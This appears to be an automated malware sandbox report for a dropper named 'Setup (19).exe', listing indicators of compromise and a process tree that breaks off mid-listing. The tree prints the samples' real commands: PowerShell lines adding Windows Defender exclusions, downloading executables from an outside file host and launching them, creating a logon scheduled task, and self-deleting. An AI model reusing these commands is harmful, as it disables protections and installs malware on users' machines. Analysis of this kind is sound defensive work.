(compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 389 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 378 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 416 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 176 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 199 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 220 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 252 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 377 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 183 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 423 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 202 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 204 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 213 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 350 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 174 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 388 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 418 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 453 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3128 Setup (19).exe 3128 Setup (19).exe 3820 H_GAN4lymZYNIe2SYb1o6PjL.exe 3820 H_GAN4lymZYNIe2SYb1o6PjL.exe 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3016 Process not Found -
Suspicious behavior: MapViewOfSection 23 IoCs
pid Process 3820 H_GAN4lymZYNIe2SYb1o6PjL.exe 2460 0UDlIYAqdx58fbBuKxF2FjgJ.exe 8948 MicrosoftEdgeCP.exe 8948 MicrosoftEdgeCP.exe 8948 MicrosoftEdgeCP.exe 8948 MicrosoftEdgeCP.exe 6596 cfsafjc 2416 MicrosoftEdgeCP.exe 2416 MicrosoftEdgeCP.exe 2416 MicrosoftEdgeCP.exe 2416 MicrosoftEdgeCP.exe 2416 MicrosoftEdgeCP.exe 2416 MicrosoftEdgeCP.exe 7324 cfsafjc 4644 MicrosoftEdgeCP.exe 4644 MicrosoftEdgeCP.exe 4644 MicrosoftEdgeCP.exe 4644 MicrosoftEdgeCP.exe 3420 cfsafjc 4644 MicrosoftEdgeCP.exe 4644 MicrosoftEdgeCP.exe 4644 MicrosoftEdgeCP.exe 4644 MicrosoftEdgeCP.exe -
Suspicious behavior: SetClipboardViewer 4 IoCs
pid Process 5744 4164647.exe 6892 5515754.exe 8324 RuntimeBroker.exe 6024 RuntimeBroker.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2624 qhRWdCBRrOEeIDbo7QDZo256.exe Token: SeDebugPrivilege 1184 Jehn52WtbMKZ9kxobh4J4A03.exe Token: SeDebugPrivilege 4052 uwtBY5_fgfWhsQUfzRGn9ts8.exe Token: SeDebugPrivilege 2136 0NKIqxJZOxkSqcoqQk5gff41.exe Token: SeDebugPrivilege 3336 WgAQMBbuvnZa4Uim1cKe4vXj.exe Token: SeDebugPrivilege 3492 9V6mnXHdynq1s7PpT244URZa.exe Token: SeDebugPrivilege 4360 tfmFgK9w71TpTpJqhUlQRQle.exe Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeDebugPrivilege 4380 MCy69zYoC6A83qNV7PWC49cY.exe Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeDebugPrivilege 4396 gdCjIZ3vQLrTFWKdOezjL1wn.exe Token: SeDebugPrivilege 4564 IvXEuwW59N_cXWlDbgjIyNx7.exe Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeRestorePrivilege 4812 WerFault.exe Token: SeBackupPrivilege 4812 WerFault.exe Token: SeDebugPrivilege 4812 WerFault.exe Token: SeDebugPrivilege 492 8md1vxAwe7Y0ndRiBYaafLjk.exe Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeDebugPrivilege 3572 4726380.exe Token: SeDebugPrivilege 4728 WerFault.exe Token: SeDebugPrivilege 4544 anyname.exe Token: SeDebugPrivilege 2032 WerFault.exe Token: SeDebugPrivilege 4468 2310645.exe Token: SeDebugPrivilege 4428 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4212 WerFault.exe Token: SeDebugPrivilege 4736 WerFault.exe Token: SeDebugPrivilege 5000 WerFault.exe Token: SeIncreaseQuotaPrivilege 4428 MicrosoftEdgeCP.exe Token: SeSecurityPrivilege 4428 MicrosoftEdgeCP.exe Token: SeTakeOwnershipPrivilege 4428 MicrosoftEdgeCP.exe Token: SeLoadDriverPrivilege 4428 MicrosoftEdgeCP.exe Token: SeSystemProfilePrivilege 4428 MicrosoftEdgeCP.exe Token: SeSystemtimePrivilege 4428 MicrosoftEdgeCP.exe Token: SeProfSingleProcessPrivilege 4428 MicrosoftEdgeCP.exe Token: SeIncBasePriorityPrivilege 4428 MicrosoftEdgeCP.exe Token: SeCreatePagefilePrivilege 4428 MicrosoftEdgeCP.exe Token: SeBackupPrivilege 4428 MicrosoftEdgeCP.exe Token: SeRestorePrivilege 4428 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 4428 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4428 MicrosoftEdgeCP.exe Token: SeSystemEnvironmentPrivilege 4428 MicrosoftEdgeCP.exe Token: SeRemoteShutdownPrivilege 4428 MicrosoftEdgeCP.exe Token: SeUndockPrivilege 4428 MicrosoftEdgeCP.exe Token: SeManageVolumePrivilege 4428 MicrosoftEdgeCP.exe Token: 33 4428 MicrosoftEdgeCP.exe Token: 34 4428 MicrosoftEdgeCP.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4372 DvMwGNgUky7bXWwCd2_zhu5C.tmp 3016 Process not Found 3016 Process not Found 6008 Cleaner Installation.exe 3016 Process not Found 3016 Process not Found 5280 Inlog.tmp 5540 WEATHER Manager.tmp 5616 VPN.tmp 7324 Setup.exe 7664 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 7492 eHGLHEnRYqK4VhmYDOUgPfia.tmp 7852 ultramediaburner.tmp 5936 Esplorarne.exe.com 3016 Process not Found 3016 Process not Found 5936 Esplorarne.exe.com 5936 Esplorarne.exe.com 5936 Esplorarne.exe.com 5580 Esplorarne.exe.com 5580 Esplorarne.exe.com 5580 Esplorarne.exe.com 2776 Esplorarne.exe.com 3016 Process not Found 3016 Process not Found 2776 Esplorarne.exe.com 2776 Esplorarne.exe.com 2776 Esplorarne.exe.com 3016 Process not Found 3016 Process not Found -
Suspicious use of SendNotifyMessage 62 IoCs
pid Process 5936 Esplorarne.exe.com 5936 Esplorarne.exe.com 5936 Esplorarne.exe.com 5936 Esplorarne.exe.com 5580 Esplorarne.exe.com 5580 Esplorarne.exe.com 5580 Esplorarne.exe.com 2776 Esplorarne.exe.com 2776 Esplorarne.exe.com 2776 Esplorarne.exe.com 2776 Esplorarne.exe.com 6312 MsiExec.exe 6312 MsiExec.exe 6312 MsiExec.exe 7352 Esplorarne.exe.com 7352 Esplorarne.exe.com 7352 Esplorarne.exe.com 8224 Esplorarne.exe.com 8224 Esplorarne.exe.com 8224 Esplorarne.exe.com 8224 Esplorarne.exe.com 8896 Esplorarne.exe.com 8896 Esplorarne.exe.com 8896 Esplorarne.exe.com 8896 Esplorarne.exe.com 8288 Esplorarne.exe.com 8288 Esplorarne.exe.com 8288 Esplorarne.exe.com 8256 Esplorarne.exe.com 8256 Esplorarne.exe.com 8256 Esplorarne.exe.com 7520 Weather.exe 7520 Weather.exe 7520 Weather.exe 7520 Weather.exe 8380 Esplorarne.exe.com 8380 Esplorarne.exe.com 8380 Esplorarne.exe.com 8668 Esplorarne.exe.com 8668 Esplorarne.exe.com 8668 Esplorarne.exe.com 6452 rundll32.exe 6452 rundll32.exe 6452 rundll32.exe 7888 Esplorarne.exe.com 7888 Esplorarne.exe.com 7888 Esplorarne.exe.com 8544 Conhost.exe 8544 Conhost.exe 8544 Conhost.exe 7900 Esplorarne.exe.com 7900 Esplorarne.exe.com 7900 Esplorarne.exe.com 8012 Esplorarne.exe.com 8012 Esplorarne.exe.com 8012 Esplorarne.exe.com 4264 powershell.exe 4264 powershell.exe 4264 powershell.exe 7764 Esplorarne.exe.com 7764 Esplorarne.exe.com 7764 Esplorarne.exe.com -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3016 Process not Found 6788 MicrosoftEdge.exe 8948 MicrosoftEdgeCP.exe 8892 cmd.exe 8948 MicrosoftEdgeCP.exe 5176 MaskVPNUpdate.exe 5204 MicrosoftEdge.exe 2416 MicrosoftEdgeCP.exe 2416 MicrosoftEdgeCP.exe 6404 MicrosoftEdge.exe 4644 MicrosoftEdgeCP.exe 4644 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3128 wrote to memory of 2852 3128 Setup (19).exe 83 PID 3128 wrote to memory of 2852 3128 Setup (19).exe 83 PID 3128 wrote to memory of 2852 3128 Setup (19).exe 83 PID 3128 wrote to memory of 1184 3128 Setup (19).exe 85 PID 3128 wrote to memory of 1184 3128 Setup (19).exe 85 PID 3128 wrote to memory of 1184 3128 Setup (19).exe 85 PID 3128 wrote to memory of 2152 3128 Setup (19).exe 84 PID 3128 wrote to memory of 2152 3128 Setup (19).exe 84 PID 3128 wrote to memory of 2152 3128 Setup (19).exe 84 PID 3128 wrote to memory of 2264 3128 Setup (19).exe 80 PID 3128 wrote to memory of 2264 3128 Setup (19).exe 80 PID 3128 wrote to memory of 2264 3128 Setup (19).exe 80 PID 3128 wrote to memory of 4052 3128 Setup (19).exe 79 PID 3128 wrote to memory of 4052 3128 Setup (19).exe 79 PID 3128 wrote to memory of 4052 3128 Setup (19).exe 79 PID 3128 wrote to memory of 3336 3128 Setup (19).exe 81 PID 3128 wrote to memory of 3336 3128 Setup (19).exe 81 PID 3128 wrote to memory of 3336 3128 Setup (19).exe 81 PID 3128 wrote to memory of 4044 3128 Setup (19).exe 82 PID 3128 wrote to memory of 4044 3128 Setup (19).exe 82 PID 3128 wrote to memory of 3676 3128 Setup (19).exe 78 PID 3128 wrote to memory of 3676 3128 Setup (19).exe 78 PID 3128 wrote to memory of 3676 3128 Setup (19).exe 78 PID 3128 wrote to memory of 3820 3128 Setup (19).exe 88 PID 3128 wrote to memory of 3820 3128 Setup (19).exe 88 PID 3128 wrote to memory of 3820 3128 Setup (19).exe 88 PID 3128 wrote to memory of 2136 3128 Setup (19).exe 87 PID 3128 wrote to memory of 2136 3128 Setup (19).exe 87 PID 3128 wrote to memory of 2136 3128 Setup (19).exe 87 PID 3128 wrote to memory of 2160 3128 Setup (19).exe 86 PID 3128 wrote to memory of 2160 3128 Setup (19).exe 86 PID 3128 wrote to memory of 2160 3128 Setup (19).exe 86 PID 3128 wrote to memory of 4028 3128 Setup (19).exe 99 PID 3128 wrote to memory of 4028 3128 Setup (19).exe 99 PID 3128 wrote to memory of 4028 3128 Setup (19).exe 99 PID 3128 wrote to memory of 3492 3128 Setup (19).exe 97 PID 3128 wrote to memory of 3492 3128 Setup (19).exe 97 PID 3128 wrote to memory of 3492 3128 Setup (19).exe 97 PID 3128 wrote to memory of 2624 3128 Setup (19).exe 98 PID 3128 wrote to memory of 2624 3128 Setup (19).exe 98 PID 3128 wrote to memory of 508 3128 Setup (19).exe 102 PID 3128 wrote to memory of 508 3128 Setup (19).exe 102 PID 3128 wrote to memory of 508 3128 Setup (19).exe 102 PID 2264 wrote to memory of 4380 2264 MCy69zYoC6A83qNV7PWC49cY.exe 105 PID 2264 wrote to memory of 4380 2264 MCy69zYoC6A83qNV7PWC49cY.exe 105 PID 2264 wrote to memory of 4380 2264 MCy69zYoC6A83qNV7PWC49cY.exe 105 PID 2852 wrote to memory of 4388 2852 IvXEuwW59N_cXWlDbgjIyNx7.exe 104 PID 2852 wrote to memory of 4388 2852 IvXEuwW59N_cXWlDbgjIyNx7.exe 104 PID 2852 wrote to memory of 4388 2852 IvXEuwW59N_cXWlDbgjIyNx7.exe 104 PID 2152 wrote to memory of 4396 2152 gdCjIZ3vQLrTFWKdOezjL1wn.exe 103 PID 2152 wrote to memory of 4396 2152 gdCjIZ3vQLrTFWKdOezjL1wn.exe 103 PID 2152 wrote to memory of 4396 2152 gdCjIZ3vQLrTFWKdOezjL1wn.exe 103 PID 3128 wrote to memory of 4492 3128 Setup (19).exe 107 PID 3128 wrote to memory of 4492 3128 Setup (19).exe 107 PID 3128 wrote to memory of 4492 3128 Setup (19).exe 107 PID 2264 wrote to memory of 4380 2264 MCy69zYoC6A83qNV7PWC49cY.exe 105 PID 2264 wrote to memory of 4380 2264 MCy69zYoC6A83qNV7PWC49cY.exe 105 PID 2264 wrote to memory of 4380 2264 MCy69zYoC6A83qNV7PWC49cY.exe 105 PID 2264 wrote to memory of 4380 2264 MCy69zYoC6A83qNV7PWC49cY.exe 105 PID 2264 wrote to memory of 4380 2264 MCy69zYoC6A83qNV7PWC49cY.exe 105 PID 2852 wrote to memory of 4564 2852 IvXEuwW59N_cXWlDbgjIyNx7.exe 108 PID 2852 wrote to memory of 4564 2852 IvXEuwW59N_cXWlDbgjIyNx7.exe 108 PID 2852 wrote to memory of 4564 2852 IvXEuwW59N_cXWlDbgjIyNx7.exe 108 PID 2152 wrote to memory of 4396 2152 gdCjIZ3vQLrTFWKdOezjL1wn.exe 103
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1232
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1408
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1820
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1192
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2492
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2448
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1056
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:788 -
C:\Users\Admin\AppData\Roaming\cfsafjcC:\Users\Admin\AppData\Roaming\cfsafjc2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6596
-
-
C:\Users\Admin\AppData\Roaming\cfsafjcC:\Users\Admin\AppData\Roaming\cfsafjc2⤵
- Suspicious behavior: MapViewOfSection
PID:7324
-
-
C:\Users\Admin\AppData\Roaming\cfsafjcC:\Users\Admin\AppData\Roaming\cfsafjc2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3420
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2836
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2764
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2708
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:1004
-
C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exe"C:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exe"2⤵
- Executes dropped EXE
PID:3676 -
C:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exeC:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4360
-
-
-
C:\Users\Admin\Documents\uwtBY5_fgfWhsQUfzRGn9ts8.exe"C:\Users\Admin\Documents\uwtBY5_fgfWhsQUfzRGn9ts8.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
C:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exe"C:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exeC:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
-
-
C:\Users\Admin\Documents\WgAQMBbuvnZa4Uim1cKe4vXj.exe"C:\Users\Admin\Documents\WgAQMBbuvnZa4Uim1cKe4vXj.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
C:\Users\Admin\Documents\4g9oUp8jAFefeykFTkbWSBy4.exe"C:\Users\Admin\Documents\4g9oUp8jAFefeykFTkbWSBy4.exe"2⤵
- Executes dropped EXE
PID:4044 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit3⤵PID:4824
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵PID:4428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵PID:7116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'4⤵PID:6724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'4⤵PID:7876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')4⤵PID:9132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')4⤵
- Blocklisted process makes network request
PID:5372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')4⤵PID:9172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'4⤵PID:6812
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"5⤵PID:1868
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit6⤵PID:2300
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵PID:388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵PID:188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵PID:1328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'7⤵PID:8972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"6⤵PID:8816
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:6276
-
-
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"7⤵PID:4932
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit8⤵PID:5624
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'9⤵
- Creates scheduled task(s)
PID:6944
-
-
-
C:\Windows\system32\services32.exe"C:\Windows\system32\services32.exe"8⤵PID:6860
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit9⤵PID:9060
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'10⤵PID:8508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'10⤵PID:8828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'10⤵PID:8636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'10⤵PID:8840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"9⤵PID:9156
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SendNotifyMessage
PID:8544
-
-
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"10⤵
- Drops file in System32 directory
PID:7556 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit11⤵
- Drops file in System32 directory
PID:4932 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:5624
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'12⤵
- Creates scheduled task(s)
PID:7744
-
-
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"11⤵PID:7460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"11⤵PID:4156
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 312⤵PID:4836
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"8⤵PID:6548
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵PID:9168
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'4⤵PID:7976
-
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"5⤵
- Adds Run key to start application
- Suspicious behavior: SetClipboardViewer
PID:8324
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'4⤵PID:8504
-
C:\Users\Admin\AppData\Local\Temp\launcher.exe"C:\Users\Admin\AppData\Local\Temp\launcher.exe"5⤵
- Suspicious use of SetThreadContext
PID:8144 -
C:\Users\Admin\AppData\Local\Temp\launcher.exe"{path}"6⤵PID:1784
-
-
-
-
-
-
C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe"C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exeC:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe3⤵
- Executes dropped EXE
PID:4388
-
-
C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exeC:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe3⤵
- Executes dropped EXE
